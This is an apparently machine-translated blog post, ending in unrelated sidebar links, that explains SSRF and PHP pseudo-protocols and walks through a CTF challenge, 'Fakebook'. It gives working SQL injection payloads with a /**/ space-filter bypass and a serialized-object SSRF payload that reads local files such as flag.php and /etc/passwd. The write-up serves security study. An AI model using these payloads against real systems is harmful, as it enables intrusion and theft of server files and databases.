当前位置:网站首页>SSRF vulnerability file pseudo protocol [netding Cup 2018] fakebook1
SSRF vulnerability file pseudo protocol [netding Cup 2018] fakebook1
2022-07-07 13:49:00 【A traveler】
About SSRF Loophole ( Server side forgery ) Reference resources SSRF Vulnerability principle attack and defense ( Super detailed summary )_ Zero tap code blog -CSDN Blog _ssrf Loophole defense
SSRF(Server-Side Request Forgery: Server side Request Forgery ) It is a security vulnerability that is constructed by the attacker to form a request initiated by the server .
In general ,SSRF The target of the attack is from Extranet Inaccessible internal system .( Because it is initiated by the server , So it can request to the internal system connected to it and isolated from the external network )
Four 、 produce SSRF Loophole function
SSRF The attack may exist in applications written in any language , Next, we will give an example php There may be SSRF Loophole function .
1、file_get_contents:
The following code uses file_get_contents Function from user specified url Get photo . Then save it on the hard disk with a random file name , And show the user .
<?php
if (isset($_POST['url']))
{
$content = file_get_contents($_POST['url']);
$filename ='./images/'.rand().';img1.jpg';
file_put_contents($filename, $content);
echo $_POST['url'];
$img = "<img src=\"".$filename."\"/>";
}
echo $img;
?>
2、sockopen():
The following code USES fsockopen Function implementation to obtain the user specified url The data of ( Documents or html). This function uses socket Establish with the server tcp Connect , Transmit raw data .
<?php
function GetFile($host,$port,$link)
{
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
} else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>
3、curl_exec():
cURL This is another very common implementation , It passes through PHP get data . file / The data is downloaded and stored in “curled” In the disk under the folder , A random number and “.txt” File extension .
<?php
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);
$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result);
echo $result;
}
?>
matters needing attention
In general PHP It won't turn on fopen Of gopher wrapper
file_get_contents Of gopher The agreement cannot URL code
file_get_contents About Gopher Of 302 The jump will appear bug, Leading to the failure of utilization
curl/libcurl 7.43 On gopher The agreement exists bug(%00 truncation ) After testing 7.49 You can use
curl_exec() Jump is not tracked by default ,
file_get_contents() file_get_contents Support php://input agreement
5、 ... and 、SSRF in URL Pseudo protocol
When we find out SSRF After the leak , The first thing to do is to test all available URL Fake protocol
file:/// Get the file content from the file system , Such as ,file:///etc/passwd
dict:// Dictionary server protocol , ACCESS Dictionary resources , Such as ,dict:///ip:6739/info:
sftp:// SSH File transfer protocol or secure file transfer protocol
ldap:// Lightweight directory access protocol
tftp:// Simple file transfer protocol
gopher:// Distributed document delivery service , You can use gopherus Generate payload
The above knowledge points come from the chapter header reference ;
from facebook Start with this example :
Reference resources :[ WANGDING cup 2018]Fakebook_ Programmer's little chicken blog -CSDN Blog
[ WANGDING cup 2018]Fakebook(ssrf Loophole )_ Tian Wen _Herbert555 The blog of -CSDN Blog
First register and then log in to find the user we registered , Click in ;
And found that URL in The variable of no, Try sql Inject :
Use comments to bypass :union/**/select
?no=-1 union/**/select 1,database(),3,4# ( Database search ) Find out 'fakebook'
?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'# ( Look up the name of the table ) Find out 'users'
?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'# ( Check field ) Field name 'no,username,data'
Joint injection here , Spaces are filtered , Just use /**/ Instead of , A series of routine findings : Serialized things :
2. Directory scanning , Found to have robots.txt, also flag.php;
open robots, You can find the source code package ;
Analysis of the source code :
<?php
class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";
public function __construct($name, $age, $blog)
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}
function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
curl_close($ch);
return $output;
}
public function getBlogContents ()
{
return $this->get($this->blog);
}
public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}
}
stay get It is found that curl_exec Associated with the ssrf , combining flag.php, Use file: agreement , And open a user's source code to see data Encrypted webpage of segment ;
So will blog Change it to file:///var/www/html/flag.php
You can deserialize , You can also directly change the serialization results found before : Change the length to 29,blog Just change it :
structure :
?no=0 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:19;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
What I don't understand here is , Why is it 4 Position plus serialization ??
Then check the source code ,data Positional base64 Just encode and decode ;
There is another unexpected method , Namely load_file(); Specific reference ;
边栏推荐
- Help tenants
- 作战图鉴:12大场景详述容器安全建设要求
- 数字ic设计——SPI
- 【面试高频题】难度 2.5/5,简单结合 DFS 的 Trie 模板级运用题
- "New red flag Cup" desktop application creativity competition 2022
- Centso7 OpenSSL error Verify return code: 20 (unable to get local issuer certificate)
- Oracle advanced (V) schema solution
- 2022-7-6 Leetcode 977. Square of ordered array
- MySQL error 28 and solution
- 2022-7-7 Leetcode 844.比较含退格的字符串
猜你喜欢
随机推荐
Data refresh of recyclerview
Deep understanding of array related problems in C language
高等数学---第八章多元函数微分学1
1、深拷贝 2、call apply bind 3、for of for in 区别
如何让join跑得更快?
干货|总结那些漏洞工具的联动使用
Ogre introduction
clion mingw64中文乱码
[QNX hypervisor 2.2 user manual]6.3.4 virtual register (guest_shm.h)
最佳实践 | 用腾讯云AI意愿核身为电话合规保驾护航
2022-7-7 Leetcode 34. Find the first and last positions of elements in a sorted array
"New red flag Cup" desktop application creativity competition 2022
Cinnamon taskbar speed
Enregistrement de la navigation et de la mise en service du robot ROS intérieur (expérience de sélection du rayon de dilatation)
Milkdown control icon
JS slow motion animation principle teaching (super detail)
《厌女:日本的女性嫌恶》摘录
Getting started with MySQL
得物客服热线的演进之路
2022-7-7 Leetcode 844. Compare strings with backspace